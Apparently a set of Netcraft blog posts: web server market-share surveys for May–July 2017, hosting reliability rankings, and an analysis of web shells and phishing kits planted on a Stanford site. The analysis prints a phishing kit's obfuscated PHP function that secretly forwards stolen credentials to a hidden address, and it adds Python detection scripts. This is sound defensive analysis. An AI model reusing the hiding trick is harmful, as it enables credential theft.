July 2017 Web Server Survey

In the July 2017 survey we received responses from 1,767,964,429 sites and 6,593,508 web-facing computers. This represents a small gain of 1.0 million sites (+0.06%) and 71,000 computers (+1.1%).

nginx growth unfaltering

A further 52,000 (+3.84%) web-facing computers were found running nginx this month, which has brought its market share up to 21.4%. It is currently the third-largest server vendor in terms of web-facing computers, but it is now only 122,000 computers away from Microsoft. With no reason to suspect that its consistently strong growth could falter soon, it is likely to take second place from Microsoft later this year.

Originally developed to solve the C10k problem, nginx has seen phenomenal growth in web-facing computers.

nginx's market share growth was also assisted by Microsoft's loss of 6,400 computers, while Apache's gain of 7,500 computers was not enough to stop its own share falling by 0.35 percentage points. Apache is still far in the lead, though – more than 2.8 million web-facing computers currently run various versions and derivatives of the Apache httpd, giving it a 42.8% share of all web-facing computers.

Microsoft now serves more than half of all sites

In terms of hostnames, Microsoft gained 78 million sites, while Apache lost 56 million. This large shift has given Microsoft more than half of the market for the first time ever – 53.2% of all hostnames – with nearly three times as many sites as Apache has.

This marks a complete role reversal from four years ago, when Apache held 52% of the market while Microsoft had just 19.7%. That was the last time more than half of the world's websites used Apache. However, the hostnames metric is volatile, being susceptible to large swathes of automatically generated sites served from relatively few computers. These types of site are not counted in Netcraft's active sites survey, which paints a very different picture: Apache has more than six times as many active sites as Microsoft, and more than twice as many as nginx.

Notably, Apache has always held the largest share of the active sites market ever since the metric was included in our surveys in 2000. While Microsoft came within 10 percentage points of Apache's share on a few occasions last decade, it is now a long way off with only a 7.48% share, compared with Apache's share of 45.2%.

Apache 2.2 reaches end of life

Apache 2.4.27 was released on 11 July, along with Apache 2.2.34, which will be the final release in the 2.2.x legacy branch. Security patches for Apache 2.2.34 may be made available until December 2017, but no further maintenance patches or releases are anticipated.

To remain secure, sites still using Apache 2.2 will need to migrate to Apache 2.4 fairly swiftly. While it is difficult to tell exactly how many sites are running soon-to-be unsupported versions of Apache 2.2, at least 72 million sites claim to be using Apache 2.2 in their Server headers. The majority of these sites are hosted in the United States.

On the same day as the Apache releases, nginx 1.12.1 stable and nginx 1.13.3 mainline were released, with both including a simple fix for an integer overflow vulnerability in nginx's range filter module.

Not to be outdone, version 2.0.0 of Microsoft's IIS Administration API was also released in July, little more than two months after 1.1.0 hit general availability. The API is intended to make it easier to manage Microsoft IIS web servers, and the new version includes a range of "under the hood" improvements that make it easier to install and configure. The Microsoft IIS team also released a new version of URL Rewrite and made several improvements to its browser-based management portal at manage.iis.net during June.

Total number of websites

Web server market share

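| Developer | June 2017 | Percent | July 2017 | Percent | Change |
|---|---|---|---|---|---|
| Microsoft | 862,255,584 | 48.80% | 940,029,828 | 53.17% | 4.37 |
| Apache | 371,461,399 | 21.02% | 315,188,480 | 17.83% | -3.20 |
| nginx | 239,666,345 | 13.56% | 266,041,296 | 15.05% | 1.48 |
| Google | 20,136,304 | 1.14% | 20,855,424 | 1.18% | 0.04 |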

Most Reliable Hosting Company Sites in June 2017

| Rank | Company (Performance Graph) | OS | Outage (hh:mm:ss) | Failed Req% | DNS | Connect | First byte | Total |
|---|---|---|---|---|---|---|---|---|
| 1 | Hyve Managed Hosting | Linux | 0:00:00 | 0.000 | 0.083 | 0.0637 | 0.132 | 0.132 |
| 2 | Memset | Linux | 0:00:00 | 0.000 | 0.138 | 0.064 | 0.239 | 0.385 |
| 3 | Netcetera | Linux | 0:00:00 | 0.000 | 0.086 | 0.080 | 0.161 | 0.161 |
| 4 | Hivelocity | Linux | 0:00:00 | 0.000 | 0.155 | 0.084 | 0.168 | 0.169 |
| 5 | GoDaddy.com Inc | Linux | 0:00:00 | 0.004 | 0.209 | 0.012 | 0.032 | 0.033 |
| 6 | Webair | Linux | 0:00:00 | 0.004 | 0.144 | 0.053 | 0.110 | 0.113 |
| 7 | ServerStack | Linux | 0:00:00 | 0.004 | 0.115 | 0.063 | 0.125 | 0.125 |
| 8 | EveryCity | SmartOS | 0:00:00 | 0.004 | 0.106 | 0.066 | 0.287 | 0.288 |
| 9 | Pair Networks | FreeBSD | 0:00:00 | 0.004 | 0.233 | 0.071 | 0.142 | 0.142 |
| 10 | Qube Managed Services | Linux | 0:00:00 | 0.009 | 0.133 | 0.063 | 0.125 | 0.125 |

Hyve Managed Hosting had the most reliable hosting company site in June, successfully responding to all of Netcraft's requests. This is Hyve's fifth consecutive top ten placement, and marks the first time it has clinched the number-one spot. The company recently announced that it is now a part of the G-Cloud 9 framework agreement, which simplifies cloud technology procurement for the UK public sector. As well as having its primary data centre in the UK, Hyve also has data centres in New Jersey, San Jose, Hong Kong, and Shanghai.

Memset’s site came in second place in June, also with no failed requests, but with a marginally slower average connection time. The UK-based company has had an uptime of 99.998% over the last three years. Its customers have included British government agencies such as the Home Office, Her Majesty's Revenue & Customs and the Cabinet Office.

Netcetera’s site also successfully responded to all of Netcraft's requests and took third place. This is the company's fourth top ten placement in Netcraft's rankings for 2017. Netcetera is based on the Isle of Man and provides data centre colocation, cloud hosting, dedicated servers and managed web hosting services.

Hivelocity came in fourth, also with no failed requests, but with a slightly slower average connection time than the companies in June 2017's top three. This is the company's second consecutive month with 100% response rate to Netcraft's queries.

Linux has once again dominated as the most commonly used operating system amongst the top ten hosting company websites, the only exceptions being EveryCity (SmartOS) and Pair Networks (FreeBSD).

Netcraft measures and makes available the response times of around thirty leading hosting providers' sites. The performance measurements are made at fifteen minute intervals from separate points around the internet, and averages are calculated over the immediately preceding 24 hour period.

From a customer's point of view, the percentage of failed requests is more pertinent than outages on hosting companies' own sites, as this gives a pointer to reliability of routing, and this is why we choose to rank our table by fewest failed requests, rather than shortest periods of outage. If the number of failed requests is equal, sites are ranked by average connection time.

Information on the measurement process and current measurements is available.

June 2017 Web Server Survey

In the June 2017 survey we received responses from 1,766,926,408 sites and 6,522,692 web-facing computers. This represents a loss of 48 million websites, although the total number of computers has grown by 118,000 (+1.8%).

All of the top three vendors lost sites in this month's survey, but all showed gains in web-facing computers. Many of the sites that disappeared were spam sites that used the .cn (China) top-level domain. Microsoft lost the largest number of sites – nearly 28 million – while Apache lost 8.9 million and nginx lost 5.4 million.

Apache still leads the market in terms of web-facing computers, but its share fell by 0.28 points to 43.1% despite gaining 33,200 additional computers. Apache also continues to lead the active sites market, and with net growth of 1.2 million active sites this month, its share has increased to 45.9%.

nginx gained the largest number of web-facing computers, increasing its total by 54,200 to 1.36 million (+4.2%), and taking its market share of computers up by 0.46 percentage points to 20.8%. It is now less than 3 percentage points behind Microsoft's share.

nginx is also still increasing its presence amongst the top million websites. This month it gained 939 top sites, in contrast to the losses felt by Apache and Microsoft, which saw 2,970 and 692 sites depart from the top million. Some of the lesser-used servers that also increased their presence in the top million included openresty, Varnish and Tengine.

Google overtakes Microsoft in active sites

Notably, Google has overtaken Microsoft in active sites – it now has 13.3 million, compared with Microsoft's 13.2 million. This gives Google a 7.8% share of the active sites market, although its share of all sites is only 1.1%.

Netcraft first started tracking Google's custom web server software as a major vendor group 10 years ago, when it was used by 2.7 million sites. Google's servers were originally grouped under Apache, as they were based on open source Apache code, but the amount of customisation warranted making a new group – and no doubt even more changes have taken place over the past 10 years. Today, there are over 20 million Google sites, around two-thirds of which are considered active. This is a much higher ratio than most other vendors see – for example, only 1.5% of the 862 million sites using Microsoft's web server software are deemed active.

The most commonly seen Google web server is GSE (Google Servlet Engine), which is used by millions of Blogger sites that use blogspot domains (e.g. funny-cats.blogspot.com and catversushuman.blogspot.ca), and also by many Blogger-powered sites that use custom domain names. GSE is also used by sites under the googledrive.com and googlegroups.com domains, along with some other Google services such as Gmail, although none has the volume of hostnames seen at Blogger.

Another Google web server is Google Frontend, which is used by hundreds of thousands of sites, including App Engine sites hosted under the appspot.com domain. This server was much more prominent in the past, as it was also used by Blogger sites before they switched to GSE. Back then, Google Frontend sites also used an acronym in their HTTP response headers (Server: GFE), but Google Frontend sites now return the full name of the server software, i.e. Server: Google Frontend.

Google Frontend is also used to serve some of Google's legacy sites and deprecated services, such as the former social networking site at jaiku.com. This was shut down by Google in 2012, and all pages on the site now use Google Frontend to serve error pages.

Another Google server – ghs – is responsible for redirecting traffic from googlepages.com sites that were created with Google Page Creator. This website creation service was shut down in 2009, but existing pages were migrated to Google Sites, which hosts user content in subdirectories under the sites.google.com hostname. When a browser visits a legacy hostname like sunsetpizza.googlepages.com, ghs will redirect the user to its new location at https://sites.google.com/site/sunsetpizza/.

Other Server headers used more sparingly by Google-hosted services include UploadServer, sffe, ESF (used by Google Docs), and gws.

Total number of websites

Web server market share

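| Developer | May 2017 | Percent | June 2017 | Percent | Change |
|---|---|---|---|---|---|
| Microsoft | 891,000,721 | 49.09% | 862,255,584 | 48.80% | -0.29 |
| Apache | 380,321,106 | 20.95% | 371,461,399 | 21.02% | 0.07 |
| nginx | 245,114,317 | 13.50% | 239,666,345 | 13.56% | 0.06 |
| Google | 20,033,229 | 1.10% | 20,136,304 | 1.14% | 0.04 |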

Most Reliable Hosting Company Sites in May 2017

| Rank | Company (Performance Graph) | OS | Outage (hh:mm:ss) | Failed Req% | DNS | Connect | First byte | Total |
|---|---|---|---|---|---|---|---|---|
| 1 | Webair | Linux | 0:00:00 | 0.000 | 0.160 | 0.053 | 0.107 | 0.109 |
| 2 | Swishmail | FreeBSD | 0:00:00 | 0.000 | 0.152 | 0.061 | 0.121 | 0.164 |
| 3 | ServerStack | Linux | 0:00:00 | 0.000 | 0.130 | 0.063 | 0.126 | 0.126 |
| 4 | Hivelocity | Linux | 0:00:00 | 0.000 | 0.168 | 0.085 | 0.169 | 0.169 |
| 5 | GoDaddy.com Inc | Linux | 0:00:00 | 0.004 | 0.238 | 0.014 | 0.036 | 0.037 |
| 6 | Hyve Managed Hosting | Linux | 0:00:00 | 0.004 | 0.096 | 0.062 | 0.128 | 0.128 |
| 7 | Qube Managed Services | Linux | 0:00:00 | 0.004 | 0.150 | 0.063 | 0.126 | 0.126 |
| 8 | www.choopa.com | Linux | 0:00:00 | 0.008 | 0.226 | 0.006 | 0.150 | 0.150 |
| 9 | Memset | Linux | 0:00:00 | 0.008 | 0.152 | 0.062 | 0.440 | 0.570 |
| 10 | Pair Networks | FreeBSD | 0:00:00 | 0.008 | 0.254 | 0.076 | 0.147 | 0.147 |

Four hosting companies responded successfully to all of Netcraft's requests during May: Webair, Swishmail, ServerStack and Hivelocity.

Webair had the lowest average connection time out of the four, and so took first place in May’s rankings. This is the first time the cloud hosting company's site has topped Netcraft's Most Reliable Hosting Company Sites ranking, but marks its fourth consecutive month in the top ten. Webair recently announced a partnership with Microsoft to offer Azure ExpressRoute, which creates a direct network connection between Webair and the Microsoft Cloud.

Swishmail's site has retained its second place position in Netcraft's ranking from April. Similarly to last month, Swishmail narrowly missed out on the top spot based on its average connection time despite having as many successful requests. The US-based company provides FreeBSD-based email and web hosting services.

ServerStack came in third, with a slightly longer average connection time than both Webair and Swishmail's site, but still no failed requests. ServerStack offers fully managed services which include software installation, proactive monitoring, automated backups, performance optimisation, troubleshooting, and virtualisation.

Hivelocity came fourth after responding successfully to all of Netcraft's requests. The hosting provider has three US-based data centres: two in Tampa, Florida and a third one in Atlanta.

Linux continues to be the predominantly used operating system, powering eight of the top ten sites. The only exceptions are Swishmail and Pair Networks which both run FreeBSD.

Netcraft measures and makes available the response times of around thirty leading hosting providers' sites. The performance measurements are made at fifteen minute intervals from separate points around the internet, and averages are calculated over the immediately preceding 24 hour period.

From a customer's point of view, the percentage of failed requests is more pertinent than outages on hosting companies' own sites, as this gives a pointer to reliability of routing, and this is why we choose to rank our table by fewest failed requests, rather than shortest periods of outage. If the number of failed requests is equal, sites are ranked by average connection time.

Information on the measurement process and current measurements is available.

Stanford Uni site infested with hacking tools and phish for months!

Stanford University has unwittingly demonstrated just how bad things can get once a website is compromised by a web shell.

Our story begins on 31 January 2017, when the website of the Paul F. Glenn Center for the Biology of Aging at Stanford University was compromised. Unfortunately, the only people who seemed to notice this at the time were other hackers, who subsequently exploited the compromise to deploy several phishing sites, hacking tools and defacement pages on glennlaboratories.stanford.edu over the following months.

During the January compromise, a hacker placed a rudimentary PHP web shell into the top-level directory of the website. The shell was named wp_conffig.php in an attempt to blend in with the rest of the WordPress software that the site uses. This naming scheme was evidently successful at avoiding detection by Stanford's website administrators, as the PHP shell was still accessible 4 months later:

This rudimentary PHP shell was installed in January and was still on the server at the time of writing. It allowed attackers to upload files and execute arbitrary commands on the Stanford web server. No authentication was required, so literally anybody could have used this page.

While WordPress has a bad history with regard to phishing, it is worth pointing out that the Stanford site has been running the latest release of WordPress (4.7.5) since 20 April 2017, and so without further investigation, the original route of compromise is not apparent. However, with an anonymously accessible web shell on the server since January, further compromises were inevitable...

By 14 May 2017, a second web shell had been uploaded to the server. This was based on the WSO (Web Shell by Orb) script, which displays directory listings and offers several other hacking tools that can be used to crack passwords and gain access to databases. Again, the hacker tried to make this web shell harder to notice by calling it config.php.

The second web shell uploaded to the Stanford site has many more features than the first. This one can also be accessed without needing a password. The timestamps next to each file allow a likely timeline of events to be reconstructed.

The WSO shell makes it apparent that the Debian server is not running the latest version of PHP. While there might not have been any unpatched security vulnerabilities that were serious enough to allow compromise, it at least demonstrates a lack of attention to security.

Six minutes later, the hacker uploaded an HTML file named Alarg53.html. This simply displayed the message "Hacked By Alarg53":

The second hacker was keen to claim responsibility for the compromise.

Similar "Hacked By Alarg53" defacement pages can be found on dozens of other websites, which suggests the hacker is well versed in using web shells to compromise websites.

Several hours later, a hacker – possibly the same one – uploaded two more PHP scripts to the server. The first of these scripts was w3mailer.php, which can be used to send large amounts of spam – ideal for sending lots of phishing emails.

The PHP Emailer SMTP script by Predator. This can be used to send phishing emails from the compromised Stanford University web server.

Incidentally, the PHP Emailer script contains the following obfuscated JavaScript, which is unwittingly executed whenever the page is accessed by the hacker who uploaded it.

This client-side code in the PHP Mailer script attempts to download and execute a remote JavaScript file. It is obfuscated to keep this fact secret from the hacker who uploaded the script.

When the code is de-obfuscated, it can be seen that it causes an externally-hosted JavaScript file to be downloaded; however, the site on which this third-party script is located is currently down. Nonetheless, it illustrates one of the ways in which the authors of these hacking tools can quickly find out where other hackers have deployed them. The author can then monetize the situation by selling the URL of the deployed tool, which will attract new hackers to the compromised server.

The de-obfuscated JavaScript shows how it attempts to load an externally hosted script.

The other PHP script – promailer.php – was uploaded five minutes later. It provides similar functionality to the previously uploaded script, but does not contain any nefarious JavaScript.

This Pro Mailer V2 script is a safer choice for the hacker, as it does not execute JavaScript from external websites.

The following day, an unknown hacker uploaded an archive named 1.zip into the top-level directory of the compromised Stanford website. This archive was unzipped on the server to instantly deploy a Chinese HiNet phishing site, designed to steal webmail credentials from customers of this Chunghwa Telecom internet service.

This may have been the first phishing site to be deployed on the compromised Stanford University website. It redirects victims to the real hinet.net website after it has stolen their credentials. It is possible that other phishing sites existed before this but were deleted by subsequent hackers.

A few days later, on 21 May, a new hacker decided to leave his trace on the server by uploading another defacement page called TFS.html. This demonstrates that at least two separate hackers have compromised the server this month alone, possibly by making use of the hacking tools that already existed on it.

Another defacement page uploaded to the Stanford University site by a different hacker.

Another HiNet phishing site was also deployed on the compromised server later that day.

After another short lull in fraudulent activity, two more archives were uploaded on 23 May: i.zip and linkedin.zip. These were extracted to multiple locations to create several phishing sites that targeted users of Office365 and LinkedIn.

The Office 365 phishing site. It simply steals a victim's credentials before redirecting them to the real Office365 login page at login.microsoftonline.com.

One of the LinkedIn phishing sites. Like the other phishing sites, it only attempts to steal a victim's username and password before redirecting them to the real site at https://www.linkedin.com/.

The following day, another archive – KC.zip – was uploaded to the compromised server. This contained a generic phishing kit that is designed to steal a victim's email address and password, without impersonating any particular brand.

The generic phishing site after it had been deployed on the Stanford server.

Regardless of what is entered into the above form, the victim will always be told that there was a login error, and that they should go back and try again. This could cause victims to try submitting different username and password combinations, giving the attacker an even greater haul of stolen credentials that might work on other websites. Each time the form is submitted, the victim's email address and password are emailed to a pair of Gmail addresses.

The generic phishing kit is configured to send stolen credentials to the same pair of Gmail addresses as the LinkedIn phishing kit, which obviously suggests that they were uploaded by the same fraudster.

Yet another phishing kit – ileowosun.zip – was uploaded to the server on 27 May. This one impersonated a SunTrust Bank login form, but used a completely different set of email addresses to collect victims' account details. This suggests yet another fraudster could have been responsible for deploying this phishing site.

This convincing SunTrust Bank phishing site was deployed on 27 May, after Netcraft had alerted the Center's director.

Interestingly, one of the PHP scripts in the SunTrust phishing kit contains the following function, which is rather more dubious than the comment and function name might suggest:

// Function to get country and country sort;
function country_sort(){
    $sorter = "";
    $array = array(114,101,115,117,108,116,98,111,120,49,52,64,103,109,97,105,108,46,99,111,109);
    $count = count($array);
    for ($i = 0; $i < $count; $i++) {
        $sorter .= chr($array[$i]);
    }
    return array($sorter, $GLOBALS['recipient']);
}

The array of integers declared in this function is decoded to yield the email address resultbox14@gmail.com. Phishing kit authors often use tricks like these to hide their own email addresses in their kits. This allows them to receive credentials from all future deployments of the kit, while letting other fraudsters do the hard work of finding compromised servers on which to deploy the kits. By disguising the author's "secret" email address within a legitimate-looking function, most fraudsters who deploy the kit are unlikely to delete or alter the nefarious code.
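When triaging a recovered kit, the same decoding can be automated. The following is an added example, not part of the original article or of Netcraft's tooling: it scans PHP source for character codes that decode to an email address which never appears in plain text. It goes slightly beyond the function shown above by also handling chains of chr() calls; the function name find_hidden_addresses and the last three sample lines are constructed for illustration.

```python
import re

# PHP integer-array literals such as array(114,101,...) or [114, 101, ...] (6+ items).
INT_ARRAY = re.compile(
    r"(?:\barray\s*\(|\[)\s*\d{1,3}(?:\s*,\s*\d{1,3}){5,}\s*[)\]]", re.I)
# Runs of chr(N) joined with PHP's "." concatenation operator (6+ items).
CHR_CHAIN = re.compile(
    r"\bchr\(\s*\d{1,3}\s*\)(?:\s*\.\s*chr\(\s*\d{1,3}\s*\)){5,}", re.I)
EMAIL = re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9-]+(?:\.[A-Za-z0-9-]+)+")

# Lines 1-10 are the function quoted in the article; lines 11-13 are constructed.
KIT_SAMPLE = '''// Function to get country and country sort;
function country_sort(){
    $sorter = "";
    $array = array(114,101,115,117,108,116,98,111,120,49,52,64,103,109,97,105,108,46,99,111,109);
    $count = count($array);
    for ($i = 0; $i < $count; $i++) {
        $sorter .= chr($array[$i]);
    }
    return array($sorter, $GLOBALS['recipient']);
}
// Constructed lines (not from the kit): a harmless array and a chr() chain.
$weights = array(1,2,3,4,5,6,7);
$cc = chr(100).chr(114).chr(111).chr(112).chr(64).chr(101).chr(120).chr(97).chr(109).chr(112).chr(108).chr(101).chr(46).chr(111).chr(114).chr(103);
'''


def _decode(numbers):
    """Turn character codes into text, or None if any is not printable ASCII."""
    if any(n < 32 or n > 126 for n in numbers):
        return None
    return "".join(chr(n) for n in numbers)


def find_hidden_addresses(php_source):
    """Return sorted (line_number, technique, address) tuples for every email
    address that only becomes visible after decoding embedded character codes."""
    findings = []
    for technique, pattern in (("int-array", INT_ARRAY), ("chr-chain", CHR_CHAIN)):
        for match in pattern.finditer(php_source):
            numbers = [int(n) for n in re.findall(r"\d+", match.group(0))]
            text = _decode(numbers)
            if text is None:
                continue  # ordinary numeric data, not encoded text
            line_number = php_source.count("\n", 0, match.start()) + 1
            for address in EMAIL.findall(text):
                # Report only addresses that are absent from the plain source.
                if address not in php_source:
                    findings.append((line_number, technique, address))
    return sorted(findings)


if __name__ == "__main__":
    for line_number, technique, address in find_hidden_addresses(KIT_SAMPLE):
        print(f"line {line_number}: {technique} decodes to {address}")
```

Addresses recovered this way are useful indicators for linking separate deployments of the same kit to its author.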

Interestingly, the KC.zip and ileowosun.zip phishing kits – as well as the directories they were unzipped into – were deleted from the server around 29 May. It is not clear who did this, but no other phishing kits or hacking tools were removed, which puts the finger of suspicion on a rival fraudster.

When a compromised server has become so infested with hacking tools and phishing kits, one ironic side effect is that other fraudsters may subsequently come along and remove the existing phishing content, thus protecting some potential victims. But of course, the general trend is for more kits to be deployed on the server, and indeed, also on 29 May, a second SunTrust phishing kit was uploaded.

What went wrong?

A single Stanford University website has ended up hosting several hacking tools that have likely been used by multiple hackers to deploy a similar number of phishing sites onto the server. Failing to notice and remove the hacking tools could well have compounded the problem by facilitating the more recent compromises.
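A routine audit of the site's top-level directory would have surfaced the files described above. The following is an added example, not Netcraft's or Stanford's tooling: it flags PHP scripts whose names imitate WordPress's own top-level files (as wp_conffig.php and config.php did), along with stray scripts, archives and HTML pages, and orders them by modification time. The file names and dates in the sample listing follow the article; the clock times and the function names are constructed.

```python
import difflib
from datetime import datetime

# Files expected in the top-level directory of a WordPress install.
WP_CORE_ROOT = {
    "index.php", "license.txt", "readme.html", "wp-activate.php",
    "wp-blog-header.php", "wp-comments-post.php", "wp-config.php",
    "wp-config-sample.php", "wp-cron.php", "wp-links-opml.php", "wp-load.php",
    "wp-login.php", "wp-mail.php", "wp-settings.php", "wp-signup.php",
    "wp-trackback.php", "xmlrpc.php",
}
ARCHIVE_EXT = (".zip", ".tar", ".gz", ".tgz", ".rar")

# Constructed listing of (file name, modification time) pairs.
SAMPLE_LISTING = [
    ("index.php", "2017-04-20T10:00:00"),
    ("wp-config.php", "2016-09-01T08:30:00"),
    ("wp-login.php", "2017-04-20T10:00:00"),
    ("readme.html", "2017-04-20T10:00:00"),
    ("wp_conffig.php", "2017-01-31T03:14:00"),
    ("config.php", "2017-05-14T11:02:00"),
    ("Alarg53.html", "2017-05-14T11:08:00"),
    ("w3mailer.php", "2017-05-14T17:40:00"),
    ("promailer.php", "2017-05-14T17:45:00"),
    ("1.zip", "2017-05-15T09:20:00"),
    ("TFS.html", "2017-05-21T13:05:00"),
]


def classify(name):
    """Return a reason string if the file does not belong in a WordPress root,
    or None if it is a core file or a type this check ignores."""
    if name in WP_CORE_ROOT:
        return None
    lowered = name.lower()
    if lowered.endswith(".php"):
        # Underscores swapped for hyphens and doubled letters are common disguises.
        normalised = lowered.replace("_", "-")
        close = difflib.get_close_matches(
            normalised, sorted(WP_CORE_ROOT), n=1, cutoff=0.85)
        if close:
            return "PHP script imitating " + close[0]
        return "unexpected PHP script"
    if lowered.endswith(ARCHIVE_EXT):
        return "unexpected archive"
    if lowered.endswith((".html", ".htm")):
        return "unexpected HTML page"
    return None


def audit_root(listing):
    """Return (mtime, name, reason) for each flagged file, oldest first, so the
    sequence of uploads can be read as a timeline."""
    findings = []
    for name, mtime in listing:
        reason = classify(name)
        if reason:
            findings.append((datetime.fromisoformat(mtime), name, reason))
    return sorted(findings)


if __name__ == "__main__":
    for mtime, name, reason in audit_root(SAMPLE_LISTING):
        print(f"{mtime:%Y-%m-%d %H:%M}  {name:<16} {reason}")
```

Modification times can be altered by anyone with write access, so the ordering is a starting point for investigation rather than proof of sequence.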

Hosting providers – including universities – can receive an alerting service from Netcraft which will notify them whenever phishing, malware, or web shells are detected on their infrastructure. Organisations targeted by high volume phishing administered via web shells may trial Netcraft's Countermeasures service.

Note: Publication of this article was delayed until Stanford University had removed the aforementioned hacking tool scripts from the website.

May 2017 Web Server Survey

In the May 2017 survey we received responses from 1,814,996,345 sites and 6,404,290 web-facing computers. Although the total number of sites has fallen slightly, by 1.4 million since April, the number of computers has grown by 83,000.

Large shifts in site counts

Although it fared well in other metrics (see below), nginx suffered a massive 30% loss of hostnames this month. With a net loss of more than 100 million sites, its market share has fallen by 5.71 percentage points to 13.5%. The majority of the sites that disappeared were Chinese-language spam sites hosted at Amazon Web Services in the United States and Japan.

Meanwhile, Microsoft gained 79 million sites, which has taken its market share up to 49.1%. This is Microsoft's highest market share in the 22-year history of the Web Server Survey, and also reflects a significant change in fortunes over the past year: Last June, Apache had the largest market share of websites, but now Microsoft's share is more than twice as large as Apache's, which fell by a further 1.73 percentage points this month to 20.95%.

nginx leads active site growth

Despite the large loss of hostnames, nginx gained nearly a million active sites, which has taken its active sites share back above 20%. This suggests most of the 104 million hostnames it lost did not have distinct content, and therefore were of little interest to ordinary web users, despite the apparent size of the change.

Apache continues to lead the active sites market quite comfortably with a 45.6% share, although a loss of 1.4 million active sites has brought this down by 0.67 percentage points. nginx stays firmly in second place, with more than twice as many active sites as Microsoft.

nginx's computer growth continues unabated

nginx's consistent computer growth has continued, making it look ever more likely to overtake Microsoft later in 2017. Its gain of 48,500 computers – combined with Microsoft's loss of 6,000 – has reduced the difference in their market shares by nearly a whole percentage point.

nginx is now within 3.46 percentage points of Microsoft's share of 23.8%; but Apache also maintains a comfortable lead in this market – it increased its web-facing computer count by 28,800 this month, keeping Apache's share above 43%.

nginx pushing others out of the top million

nginx is also continuing to make strong progress amongst the top million websites, where it has been ahead of Microsoft for the past few years. It was the only major vendor to increase its presence this month, resulting in thousands of competing vendors' websites being pushed out of the top million. Apache suffered most, with 3,200 Apache-powered sites departing the top million, but it still leads this market with a 40.5% presence.

Apache has exhibited a slow and steady decline over the past several years. Coupled with nginx's consistent growth within the top million sites, the gap between the two is ever decreasing; however, it looks like it will be a good year or two until nginx seriously starts to threaten Apache's lead.

New nginx 1.13 mainline branch

nginx 1.13.0 was released on 25th April. This is the first release on the new, actively-developed 1.13.x mainline branch, adding bugfixes and new features to what was essentially the most recent stable version of nginx (1.12.0).

The most notable new feature in nginx 1.13.0 is its support for TLS 1.3, which aims to be the latest and most secure version of the Transport Layer Security protocol – although not many underlying crypto libraries actually offer TLS 1.3 yet. The TLS 1.3 specification has not yet been finalised, although the working draft has been sufficient for some servers and clients to implement it. For example, Mozilla's NSS cryptographic library – which is used by Firefox – enables TLS 1.3 support by default.

Microsoft IIS Administration API enters general availability

The Microsoft IIS Administration API that we mentioned in February is now Generally Available. The newest 1.1.0 release also facilitates management of the IIS Central Certificate Store, and includes an improved certificate API. These features are intended to make it easier to manage certificates across entire farms of web servers.

LiteSpeed enters the Amazon cloud

LiteSpeed Technologies is now a Technology Partner in the Amazon Web Services Partner Network (APN), coinciding with the release of the LiteSpeed Web Server AMI. This Amazon Machine Image is based on CentOS 7 with the LiteSpeed Web Server pre-installed. AWS users can now use this AMI to quickly deploy ready-to-use virtual machines that run the LiteSpeed Web Server in the cloud.

This month's Web Server Survey found 6.4 million websites running LiteSpeed, which encompasses 2.3 million active sites, more than 2 million unique domain names, and nearly 11,000 web-facing computers. One of the busiest sites currently using LiteSpeed is FanFiction.Net, which is an automated fan fiction archive.

Enter the Beaver

China saw a large number of new sites being served by the relatively unknown "Beaver" web server. Just over a million sites now exhibit the Beaver Server header, and these make use of more than 110,000 unique domain names – mostly under the .cn top-level domain. Most of the sites are hosted by Aliyun, which is China's largest cloud hosting provider, while the majority of the rest are hosted by other Chinese companies. Only a single Beaver site is hosted outside of China – this solitary instance is hosted in Japan, at Amazon's Tokyo AWS region.

The behaviour of these sites suggests that Beaver might not be an entirely new web server, but possibly an application based on Microsoft's HTTP Server API (HTTPAPI 2.0). This API lets C/C++ programmers receive HTTP requests and send responses without using Microsoft IIS. At least 38 million other websites also use HTTPAPI 2.0.

But most of the Beaver sites are currently inaccessible and display the following message: "According to the filing requirements of China's Ministry of Industry and Information Technology (MIIT), the website is accessible only if the ICP information is accurate and the ICP license is filed". An ICP Filing ("Bei'an") is required by all content providers in China before they can use hosting and CDN products, but this only allows them to be used for informational purposes. A Commercial ICP Licence ("Zheng") is required for any website that sells goods or services that directly generate revenue online.

Pepyaka making the web more friendly

The little-known Pepyaka web server has also been quietly growing. This server is used predominantly by Wix, an Israeli company that provides a friendly website building platform to millions of users. Wix provides free website hosting under the *.wix.com domain, or customers can get a free custom domain name when upgrading to one of Wix's yearly premium plans.

This business model has led to a high ratio of domains to hostnames amongst the Pepyaka install base. Wix-hosted websites alone account for 1.4% of all unique domain names in use on the web, which is no mean feat. All of these sites are hosted within the Amazon Web Services cloud, using Pepyaka version 1.11.3. This version number, coupled with Wix's previous uses of nginx, suggests that it could be based on last year's mainline version of nginx.

Total number of websites

Web server market share

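| Developer | April 2017 | Percent | May 2017 | Percent | Change |
|---|---|---|---|---|---|
| Microsoft | 812,157,808 | 44.71% | 891,000,721 | 49.09% | 4.38 |
| Apache | 412,130,526 | 22.69% | 380,321,106 | 20.95% | -1.73 |
| nginx | 349,092,975 | 19.22% | 245,114,317 | 13.50% | -5.71 |
| Google | 19,121,684 | 1.05% | 20,033,229 | 1.10% | 0.05 |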